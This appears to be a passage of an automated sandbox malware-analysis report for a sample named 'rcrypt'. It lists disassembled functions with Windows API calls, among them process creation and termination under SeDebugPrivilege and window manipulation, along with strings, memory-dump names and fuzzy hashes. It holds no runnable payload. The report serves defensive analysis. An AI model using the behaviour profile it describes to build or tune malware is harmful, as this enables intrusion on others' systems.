Opcode ID: 27aa1a5ed2ee42f7756be3f881efa7c6c2f30eb648e7af4cbdb66ad604ab2759
Instruction ID: 04cf3f62dad8082f2b01837f704a173b29dc301f1da8a89eaadeca4a2a0749a9
Opcode Fuzzy Hash: 27aa1a5ed2ee42f7756be3f881efa7c6c2f30eb648e7af4cbdb66ad604ab2759
Instruction Fuzzy Hash: 0A319D7160521AABDB119F60EC48ABF7BB8EF08306F004529FC25D6551D770DAD2CBA0

Function 001516DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00151700
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00150778,?,00000001), ref: 00151714
GetWindowThreadProcessId.USER32(00000000), ref: 0015171B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00150778,?,00000001), ref: 0015172A
GetWindowThreadProcessId.USER32(?,00000000), ref: 0015173C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00150778,?,00000001), ref: 00151755
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00150778,?,00000001), ref: 00151767
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00150778,?,00000001), ref: 001517AC
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00150778,?,00000001), ref: 001517C1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00150778,?,00000001), ref: 001517CC

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 012487776e0fbde2e9da5314bcac65649cb3905f7c56c2c3ee88f6265db12160
Instruction ID: 80bfc468ef9649c7c2b585f1e2d927014bc55491a60fded03726fba59ae5e6a7
Opcode Fuzzy Hash: 012487776e0fbde2e9da5314bcac65649cb3905f7c56c2c3ee88f6265db12160
Instruction Fuzzy Hash: E131AE75604204FBEB139F18DC84F7A3BB9EB9D716F104128FC249A6A0D7749DC48B64

Function 0014A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0014AA64), ref: 0014A9A2

Strings

CLASS, xrefs: 0014A721
INSTANCE, xrefs: 0014A8B0
TEXT, xrefs: 0014A8D9
CLASSNN, xrefs: 0014A744
NAME, xrefs: 0014A7D4
REGEXPCLASS, xrefs: 0014A767

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 93f4745d459a83157f4af86d91ce04857a310afdd4be002b8013ace8e5fe475f
Instruction ID: 2af89441c99f6832027b4ebd022f7839028d85dc7bac3dcd8a4b22f5bf7eae1e
Opcode Fuzzy Hash: 93f4745d459a83157f4af86d91ce04857a310afdd4be002b8013ace8e5fe475f
Instruction Fuzzy Hash: 6991C570A40206EBDF1CDF60C481BE9FB74FF14314F928129E999A71A1DF306A99DB91

Function 0017B60B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00A654A8), ref: 0017B6A5
IsWindowEnabled.USER32(00A654A8), ref: 0017B6B1
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0017B795
SendMessageW.USER32(00A654A8,000000B0,?,?), ref: 0017B7CC
IsDlgButtonChecked.USER32(?,?), ref: 0017B809
GetWindowLongW.USER32(00A654A8,000000EC), ref: 0017B82B
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0017B843

Strings

@U=u, xrefs: 0017B795, 0017B7CC, 0017B843

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID: @U=u
API String ID: 4072528602-2594219639
Opcode ID: 4238b7cb1e9ebc45c9d82c4a9a01d547bfec791dee29c6d0ad4d73d002baa5ed
Instruction ID: 2a051cff7bacc6683ead7d8bdabab318ec487e6621fc0f1c9a1f25c7ebaa92f1
Opcode Fuzzy Hash: 4238b7cb1e9ebc45c9d82c4a9a01d547bfec791dee29c6d0ad4d73d002baa5ed
Instruction Fuzzy Hash: 42718D74608204AFDB289F64C8E4FFA7BB9FF59300F148069FA5D972A1C731A981CB50

Function 00176FEF Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00177093
SendMessageW.USER32(?,00001036,00000000,?), ref: 001770A7
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 001770C1
_wcscat.LIBCMT ref: 0017711C
SendMessageW.USER32(?,00001057,00000000,?), ref: 00177133
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00177161

Strings

@U=u, xrefs: 00177093, 001770A7
SysListView32, xrefs: 00177065

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: @U=u$SysListView32
API String ID: 307300125-1908207174
Opcode ID: 8665c9d424db0122fd868bb1eddb969cf7ac2c42b84b21267a2a206ab7070cdb
Instruction ID: bdc1412b49195607f0c9828ca7b3a42058e151abcb707b5c57d1604fd8bbf373
Opcode Fuzzy Hash: 8665c9d424db0122fd868bb1eddb969cf7ac2c42b84b21267a2a206ab7070cdb
Instruction Fuzzy Hash: D041C271A44308AFDB219FA4CC85BEE77B8EF08350F10442AF548E72D2D7719D858B60

Function 0017653C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0017655B
GetWindowLongW.USER32(00A654A8,000000F0), ref: 0017658E
GetWindowLongW.USER32(00A654A8,000000F0), ref: 001765C3
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 001765F5
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0017661F
GetWindowLongW.USER32(00000000,000000F0), ref: 00176630
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0017664A

Strings

@U=u, xrefs: 0017655B, 001765F5, 0017661F

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID: @U=u
API String ID: 2178440468-2594219639
Opcode ID: dae7c5011b1439be736a51918c2c91233adfef80699e673b69abbb3e3e4835c3
Instruction ID: 491c3e9a1ec298d776043797cca27a37840b7b184c9bb14003fdf8b794c22291
Opcode Fuzzy Hash: dae7c5011b1439be736a51918c2c91233adfef80699e673b69abbb3e3e4835c3
Instruction Fuzzy Hash: B8312431644610AFDB21CF28DC84F553BF1FB5A750F2982A8F5098B6B6CB71AC81EB51

Function 00168F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0017F910), ref: 0016903D
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0017F910), ref: 00169071
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 001691EB
SysFreeString.OLEAUT32(?), ref: 00169215

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 4b84ffe2a6da9ec3f2bceb42f6772c3aecb5ec2733e7c3cf0ffcfb6323db4fe6
Instruction ID: c045357629bd0741f3ce3632b5c036f8c1db572a9924b38d0bdd725908819db8
Opcode Fuzzy Hash: 4b84ffe2a6da9ec3f2bceb42f6772c3aecb5ec2733e7c3cf0ffcfb6323db4fe6
Instruction Fuzzy Hash: 29F10971A00109EFDB04DFA4CC88EAEB7B9FF49315F208499F915AB251DB31AE56CB50

Function 0016F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0016F9C9
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0016FB5C
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0016FB80
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0016FBC0
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0016FBE2
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0016FD5E
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0016FD90
CloseHandle.KERNEL32(?), ref: 0016FDBF
CloseHandle.KERNEL32(?), ref: 0016FE36

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 38a4e583ca3fde7cc0059e9e7b67f229a1ceeff03b06cb6e176a4f70a2cde536
Instruction ID: 883d6c49f7fe956ff706081db15180d7e76bdd058a1ec43af37e58d948928c07
Opcode Fuzzy Hash: 38a4e583ca3fde7cc0059e9e7b67f229a1ceeff03b06cb6e176a4f70a2cde536
Instruction Fuzzy Hash: 6FE1D331604301DFC724EF24D881B6ABBE1BF89354F15896DF9998B2A2CB31DC56CB52

Function 00154F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 001548AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001538D3,?), ref: 001548C7

Part of subcall function 001548AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001538D3,?), ref: 001548E0

Part of subcall function 00154CD3: GetFileAttributesW.KERNEL32(?,00153947), ref: 00154CD4

lstrcmpiW.KERNEL32(?,?), ref: 00154FE2
_wcscmp.LIBCMT ref: 00154FFC
MoveFileW.KERNEL32(?,?), ref: 00155017

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 38d37349a699fa42e2d245a5578fa8c6062188caf2b5d1606f72f43514418c13
Instruction ID: c7b0db21408f94521c84e25f84f7a4330b87d35c2e6b8ffea9a249356fb2109a
Opcode Fuzzy Hash: 38d37349a699fa42e2d245a5578fa8c6062188caf2b5d1606f72f43514418c13
Instruction Fuzzy Hash: C95185B20087859BC724DB94DC819DFB3ECAF94341F00092EF699C7192EF74A18C8766

Function 00148E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00148A84,00000B00,?,?), ref: 00148E0C
HeapAlloc.KERNEL32(00000000,?,00148A84,00000B00,?,?), ref: 00148E13
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00148A84,00000B00,?,?), ref: 00148E28
GetCurrentProcess.KERNEL32(?,00000000,?,00148A84,00000B00,?,?), ref: 00148E30
DuplicateHandle.KERNEL32(00000000,?,00148A84,00000B00,?,?), ref: 00148E33
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00148A84,00000B00,?,?), ref: 00148E43
GetCurrentProcess.KERNEL32(00148A84,00000000,?,00148A84,00000B00,?,?), ref: 00148E4B
DuplicateHandle.KERNEL32(00000000,?,00148A84,00000B00,?,?), ref: 00148E4E
CreateThread.KERNEL32(00000000,00000000,00148E74,00000000,00000000,00000000), ref: 00148E68

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: d29db5bdc0585176619ab170f8467ed6bf8423ffc4508cf5eeea000e56624539
Instruction ID: 0d30fd88b4ec45f94b07b97651678a0347816813b83fc6d15d3aad4e7503f3b5
Opcode Fuzzy Hash: d29db5bdc0585176619ab170f8467ed6bf8423ffc4508cf5eeea000e56624539
Instruction Fuzzy Hash: 6501B6B5240308FFE710ABA5DC4DF6B3BACEB89711F404425FA09DB6A1CA709881CB30

Function 00169428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0016947C
VariantInit.OLEAUT32(?), ref: 0016954D
VariantInit.OLEAUT32(?), ref: 0016964E
VariantClear.OLEAUT32(?), ref: 00169658
VariantClear.OLEAUT32(?), ref: 001696B5

Strings

Null Object assignment in FOR..IN loop, xrefs: 001694DD, 0016960B, 001696C3
Incorrect Object type in FOR..IN loop, xrefs: 00169631

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: fe15b34a1c865ec3439de80542a608aac6b5e218b412f59b9893e00122a6921a
Instruction ID: 7cc604023a67cd612101e1b7b7c047c24d36ae1e533d0fc846647c92b1dfb8c8
Opcode Fuzzy Hash: fe15b34a1c865ec3439de80542a608aac6b5e218b412f59b9893e00122a6921a
Instruction Fuzzy Hash: B3919E71A00319ABDF25DFA5CC48FAEBBB8EF45710F10815AF919AB280D7709955CFA0

Function 00169A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00147652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0014758C,80070057,?,?,?,0014799D), ref: 0014766F
Part of subcall function 00147652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0014758C,80070057,?,?), ref: 0014768A
Part of subcall function 00147652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0014758C,80070057,?,?), ref: 00147698
Part of subcall function 00147652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0014758C,80070057,?), ref: 001476A8

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00169B1B
_memset.LIBCMT ref: 00169B28
_memset.LIBCMT ref: 00169C6B
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00169C97
CoTaskMemFree.OLE32(?), ref: 00169CA2

Strings

NULL Pointer assignment, xrefs: 00169CF0

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: e18364a3af94afef8d9fc21b7741a25c34ed417546d0cc1dc50b471d6d42cf65
Instruction ID: 8603aca330d19fc2a3ca866acfe3bf7e2b1d7cd21a9e7933c04ed23796199f43
Opcode Fuzzy Hash: e18364a3af94afef8d9fc21b7741a25c34ed417546d0cc1dc50b471d6d42cf65
Instruction Fuzzy Hash: 61913871D00219ABDF10DFA4DC80AEEBBB9BF08310F20416AF519A7291DB705A55CFA1

Function 0016EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00153E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00153EB6
Part of subcall function 00153E91: Process32FirstW.KERNEL32(00000000,?), ref: 00153EC4
Part of subcall function 00153E91: CloseHandle.KERNEL32(00000000), ref: 00153F8E

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0016ECB8
GetLastError.KERNEL32 ref: 0016ECCB
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0016ECFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 0016ED77
GetLastError.KERNEL32(00000000), ref: 0016ED82
CloseHandle.KERNEL32(00000000), ref: 0016EDB7

Strings

SeDebugPrivilege, xrefs: 0016ECD6

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 01fe51a69be71ce2a269e0ab2c67e7b91bd1a8c6768a4bbd4a40ab81a0fdb59b
Instruction ID: dbc4965ced60eab5edfc57e030e979e96df1a4c6a4ca7fef69a35e1c3f3d8188
Opcode Fuzzy Hash: 01fe51a69be71ce2a269e0ab2c67e7b91bd1a8c6768a4bbd4a40ab81a0fdb59b
Instruction Fuzzy Hash: 8741A9712042019FDB24EF24CC96FBEB7A1AF94714F18801CF9469B2D2DBB5A855CB92

Function 0017B958 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(001B67B0,00000000,00A654A8,?,?,001B67B0,?,0017B862,?,?), ref: 0017B9CC
EnableWindow.USER32(00000000,00000000), ref: 0017B9F0
ShowWindow.USER32(001B67B0,00000000,00A654A8,?,?,001B67B0,?,0017B862,?,?), ref: 0017BA50
ShowWindow.USER32(00000000,00000004,?,0017B862,?,?), ref: 0017BA62
EnableWindow.USER32(00000000,00000001), ref: 0017BA86
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0017BAA9

Strings

@U=u, xrefs: 0017BAA9

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID: @U=u
API String ID: 642888154-2594219639
Opcode ID: ce1cd3123f9da668c42172442bcd6c1676a8af9e49b800e80d2194496ff36d10
Instruction ID: 85eb989919abd3cdc4f11dcbc32a837538d4769e383cd9a494154c922d7bfc48
Opcode Fuzzy Hash: ce1cd3123f9da668c42172442bcd6c1676a8af9e49b800e80d2194496ff36d10
Instruction Fuzzy Hash: 70413E74648241AFDB26DF24C4C9B957BF1FB05314F1882B9FA5C8F6A2C731A886CB51

Function 00153226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 001532C5

Strings

info, xrefs: 00153266
question, xrefs: 0015327E
warning, xrefs: 001532AE
blank, xrefs: 00153247
stop, xrefs: 00153296

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: f02012fa36270e122dc9b30c667bfdf2919e55f7fbf43f993f5af9e7cdcb4c84
Instruction ID: a5ed30e2f80fe43f132d9d67e20feb67c8cad1c4755c443b9031ab42f085b955
Opcode Fuzzy Hash: f02012fa36270e122dc9b30c667bfdf2919e55f7fbf43f993f5af9e7cdcb4c84
Instruction Fuzzy Hash: 2911053520C74AFAE7095A54DC42DAAB39CEF1A3B1F20002AFD30AB181E7A15B8545B5

Function 00154534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0015454E
LoadStringW.USER32(00000000), ref: 00154555
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0015456B
LoadStringW.USER32(00000000), ref: 00154572
_wprintf.LIBCMT ref: 00154598
MessageBoxW.USER32(00000000,?,?,00011010), ref: 001545B6

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00154593

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
